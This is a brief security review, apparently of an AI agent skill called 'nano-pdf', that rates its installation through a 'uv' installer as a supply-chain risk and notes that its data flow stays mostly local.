nano-pdf

The skill's stated purpose (PDF editing via natural language) is coherent with its described CLI usage. However, the installation path via an unverifiable 'uv' installer introduces a notable supply-chain risk and warrants caution. Data flow is predominantly local (read/write PDFs) with no evident credential or network data exfiltration, but the installation vector justifies classifying the overall risk as Suspicious to High risk due to unverifiable binary delivery. If the installer can be replaced with a verifiable, official package registry flow (e.g., pip install nano-pdf from PyPI with a standard build process), the risk would shift toward Benign.